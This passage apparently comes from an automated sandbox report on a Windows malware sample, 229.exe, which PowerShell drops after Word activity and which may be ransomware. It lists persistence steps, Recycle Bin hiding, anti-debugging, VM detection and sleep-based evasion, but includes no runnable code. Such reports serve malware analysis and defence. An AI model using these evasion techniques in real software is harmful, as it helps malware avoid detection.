Source: C:\Windows\Temp\229.exe	Code function: 5_2_00415974 push edx; iretd	5_2_0041597F
Source: C:\Windows\Temp\229.exe	Code function: 5_2_00414FE7 push es; retf	5_2_00414FF0
Source: C:\Windows\Temp\229.exe	Code function: 5_2_0042B8B6 push esp; retf	5_2_0042B8B7
Source: C:\Windows\Temp\229.exe	Code function: 5_2_0042B2B8 push esp; retf	5_2_0042B2C0
Source: C:\Windows\Temp\229.exe	Code function: 5_1_00416096 push ecx; ret	5_1_004160A9
Source: C:\Windows\Temp\229.exe	Code function: 5_1_00415A9E push ecx; ret	5_1_00415AB1

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Executable created and started: c:\windows\temp\229.exe

Jump to behavior

Infects executable files (exe, dll, sys, html)

Show sources

Source: C:\Windows\Temp\229.exe

System file written: C:\Users\user\AppData\Roaming\.jre\Welcome.html

Jump to behavior

Drops PE files

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\Temp\229.exe

Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\Temp\229.exe

Jump to dropped file

Searches for installed JRE in non-default directory

Show sources

Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\.jre\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\.jre\bin\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\.jre\bin\client\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\.jre\bin\dtplugin\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\.jre\bin\plugin2\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\applet\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\cmm\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\deploy\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\ext\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\fonts\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\i386\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\images\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\images\cursors\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\jfr\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\management\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\security\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\security\policy\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\security\policy\limited\ read data or list directory \| synchronize	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\.jre\lib\security\policy\unlimited\ read data or list directory \| synchronize	Jump to behavior

Boot Survival:

Stores files to the Windows start menu directory

Show sources

Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\Start Menu\PSVULHG-MANUAL.txt			Jump to behavior
Source: C:\Windows\Temp\229.exe	File created: C:\Users\Default\Start Menu\3c4e07e63c4e000531d.lock			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Creates files in the recycle bin to hide itself

Show sources

Source: C:\Windows\Temp\229.exe

File created: C:\$Recycle.Bin\PSVULHG-MANUAL.txt

Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Show sources

Source: C:\Windows\Temp\229.exe

Code function: 5_1_00414A70 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

5_1_00414A70

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1144	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1812	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Windows\Temp\229.exe	Code function: 5_2_00408A8F lstrlenW,FindFirstFileExW,FindFirstFileW,FindNextFileW,CloseHandle,	5_2_00408A8F
Source: C:\Windows\Temp\229.exe	Code function: 5_2_0042C8FB FindFirstFileExW,	5_2_0042C8FB
Source: C:\Windows\Temp\229.exe	Code function: 5_1_0042C8FB FindFirstFileExW,	5_1_0042C8FB

Contains functionality to query system information

Show sources

Source: C:\Windows\Temp\229.exe

Code function: 5_2_00404F8F GetSystemInfo,

5_2_00404F8F

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Show sources

Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp

Binary or memory string: Hyper-V</a></li><li><a href="https://masterhost.ru/service/hosting/vps/#vpsPlusMssql">VPS + MSSQL</a></li></ul></li></ul></nav><nav><ul class="nav"><li><a href="https://masterhost.ru/service/hardware/rent/">

Queries a list of all running processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Show sources

Source: C:\Windows\Temp\229.exe

Code function: 5_2_0042959E IsDebuggerPresent,OutputDebugStringW,

5_2_0042959E

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Show sources

Source: C:\Windows\Temp\229.exe

Code function: 5_2_0040831E VirtualAlloc 00000000,00000000,?,00408131,00000010

5_2_0040831E

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Windows\Temp\229.exe

Code function: 5_2_0040C05D GetModuleHandleA,LoadLibraryA,GetProcAddress,

5_2_0040C05D

Contains functionality to read the PEB

Show sources

Source: C:\Windows\Temp\229.exe	Code function: 5_2_0040108B mov esi, dword ptr fs:[00000030h]	5_2_0040108B
Source: C:\Windows\Temp\229.exe	Code function: 5_2_001E1530 mov eax, dword ptr fs:[00000030h]	5_2_001E1530
Source: C:\Windows\Temp\229.exe	Code function: 5_2_001E3104 mov eax, dword ptr fs:[00000030h]	5_2_001E3104
Source: C:\Windows\Temp\229.exe	Code function: 5_2_0042C54C mov eax, dword ptr fs:[00000030h]	5_2_0042C54C
Source: C:\Windows\Temp\229.exe	Code function: 5_2_0042C5C5 mov eax, dword ptr fs:[00000030h]	5_2_0042C5C5
Source: C:\Windows\Temp\229.exe	Code function: 5_2_0042C592 mov eax, dword ptr fs:[00000030h]	5_2_0042C592
Source: C:\Windows\Temp\229.exe	Code function: 5_2_004226CA mov eax, dword ptr fs:[00000030h]	5_2_004226CA
Source: C:\Windows\Temp\229.exe	Code function: 5_1_0042C54C mov eax, dword ptr fs:[00000030h]	5_1_0042C54C
Source: C:\Windows\Temp\229.exe	Code function: 5_1_0042C5C5 mov eax, dword ptr fs:[00000030h]	5_1_0042C5C5
Source: C:\Windows\Temp\229.exe	Code function: 5_1_0042C592 mov eax, dword ptr fs:[00000030h]	5_1_0042C592
Source: C:\Windows\Temp\229.exe	Code function: 5_1_004226CA mov eax, dword ptr fs:[00000030h]	5_1_004226CA

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Show sources

Source: C:\Windows\Temp\229.exe

Code function: 5_2_00401B43 GetProcessHeap,

5_2_00401B43

Enables debug privileges

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Contains functionality to register its own exception handler

Show sources

Source: C:\Windows\Temp\229.exe	Code function: 5_2_00415EBC SetUnhandledExceptionFilter,	5_2_00415EBC
Source: C:\Windows\Temp\229.exe	Code function: 5_1_00415FF1 SetUnhandledExceptionFilter,	5_1_00415FF1
Source: C:\Windows\Temp\229.exe	Code function: 5_1_00416212 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_1_00416212
Source: C:\Windows\Temp\229.exe	Code function: 5_1_0041A667 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_1_0041A667
Source: C:\Windows\Temp\229.exe	Code function: 5_1_00415E5F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_1_00415E5F

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Show sources

